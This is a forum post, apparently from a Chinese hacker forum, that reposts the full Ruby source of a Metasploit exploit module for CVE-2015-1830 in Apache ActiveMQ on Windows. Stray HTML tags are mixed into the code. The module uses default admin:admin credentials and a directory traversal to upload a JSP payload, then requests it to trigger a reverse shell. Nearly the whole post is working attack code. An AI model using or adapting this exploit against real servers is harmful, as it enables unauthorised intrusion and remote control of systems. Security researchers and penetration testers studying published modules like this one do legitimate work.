• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Apache ActiveMQ 5.11.1目录遍历/ Shell上传漏洞


This Wind

Recommended Posts

发布内容作者:Metasploit                                              漏洞危害等级:critlow_4.gif〔严重〕

描述:

此Metasploit模块利用适用于Windows的5.11.2之前的Apache ActiveMQ版本5.x中的目录遍历漏洞(CVE-2015-1830)。该模块尝试使用带有默认ActiveMQ凭据admin:admin(或用户提供的其他凭据)的HTTP PUT请求,通过遍历路径/ fileserver / .. \\ admin \\将JSP有效负载上传到/ admin目录。然后,它向目标上的/admin/<payload>.jsp发出HTTP GET请求,以触发有效负载并获取外壳。

CVE编号:CVE-2015-1830

 

##<font></font>
# This module requires Metasploit: https://metasploit.com/download<font></font>
# Current source: https://github.com/rapid7/metasploit-framework<font></font>
##<font></font>
<font></font>
class MetasploitModule < Msf::Exploit::Remote<font></font>
  Rank = ExcellentRanking<font></font>
<font></font>
  include Msf::Exploit::Remote::HttpClient<font></font>
<font></font>
  def initialize(info = {})<font></font>
    super(update_info(info,<font></font>
      'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',<font></font>
      'Description'    => %q{<font></font>
        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache<font></font>
        ActiveMQ 5.x before 5.11.2 for Windows.<font></font>
<font></font>
        The module tries to upload a JSP payload to the /admin directory via the traversal<font></font>
        path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ<font></font>
        credentials admin:admin (or other credentials provided by the user). It then issues<font></font>
        an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the<font></font>
        payload and obtain a shell.<font></font>
      },<font></font>
      'Author'          =><font></font>
        [<font></font>
          'David Jorm',     # Discovery and exploit<font></font>
          'Erik Wynter'     # @wyntererik - Metasploit<font></font>
        ],<font></font>
      'References'     =><font></font>
        [<font></font>
          [ 'CVE', '2015-1830' ],<font></font>
          [ 'EDB', '40857'],<font></font>
          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]<font></font>
        ],<font></font>
      'Privileged'     => false,<font></font>
      'Platform'    => %w{ win },<font></font>
      'Targets'     =><font></font>
        [<font></font>
          [ 'Windows Java',<font></font>
            {<font></font>
              'Arch' => ARCH_JAVA,<font></font>
              'Platform' => 'win'<font></font>
            }<font></font>
          ],<font></font>
        ],<font></font>
      'DisclosureDate' => '2015-08-19',<font></font>
      'License'        => MSF_LICENSE,<font></font>
      'DefaultOptions'  => {<font></font>
        'RPORT' => 8161,<font></font>
        'PAYLOAD' => 'java/jsp_shell_reverse_tcp'<font></font>
        },<font></font>
      'DefaultTarget'  => 0))<font></font>
<font></font>
    register_options([<font></font>
      OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),<font></font>
      OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),<font></font>
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),<font></font>
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])<font></font>
    ])<font></font>
  end<font></font>
<font></font>
  def check<font></font>
    print_status("Running check...")<font></font>
    testfile = Rex::Text::rand_text_alpha(10)<font></font>
    testcontent = Rex::Text::rand_text_alpha(10)<font></font>
<font></font>
    send_request_cgi({<font></font>
      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),<font></font>
      'headers'     => {<font></font>
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<font></font>
        },<font></font>
      'method'    => 'PUT',<font></font>
      'data'      => "<% out.println(\"#{testcontent}\");%>"<font></font>
    })<font></font>
<font></font>
    res1 = send_request_cgi({<font></font>
      'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),<font></font>
      'headers'     => {<font></font>
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<font></font>
        },<font></font>
      'method'    => 'GET'<font></font>
    })<font></font>
<font></font>
    if res1 && res1.body.include?(testcontent)<font></font>
      send_request_cgi(<font></font>
        opts = {<font></font>
          'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),<font></font>
          'headers'     => {<font></font>
            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<font></font>
            },<font></font>
          'method'    => 'DELETE'<font></font>
        },<font></font>
        timeout = 1<font></font>
      )<font></font>
      return Exploit::CheckCode::Vulnerable<font></font>
    end<font></font>
<font></font>
    Exploit::CheckCode::Safe<font></font>
  end<font></font>
<font></font>
  def exploit<font></font>
    print_status("Uploading payload...")<font></font>
    testfile = Rex::Text::rand_text_alpha(10)<font></font>
    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.<font></font>
<font></font>
    send_request_cgi({<font></font>
      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),<font></font>
      'headers'     => {<font></font>
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<font></font>
        },<font></font>
      'method'    => 'PUT',<font></font>
      'data'      => payload.encoded<font></font>
    })<font></font>
<font></font>
    print_status("Payload sent. Attempting to execute the payload.")<font></font>
    res = send_request_cgi({<font></font>
      'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),<font></font>
      'headers'     => {<font></font>
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<font></font>
      },<font></font>
      'method'    => 'GET'<font></font>
    })<font></font>
    if res && res.code == 200<font></font>
      print_good("Payload executed!")<font></font>
    else<font></font>
      fail_with(Failure::PayloadFailed, "Failed to execute the payload")<font></font>
    end<font></font>
  end<font></font>
end<font></font>
<font></font>
#  [2020-03-20]  #
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now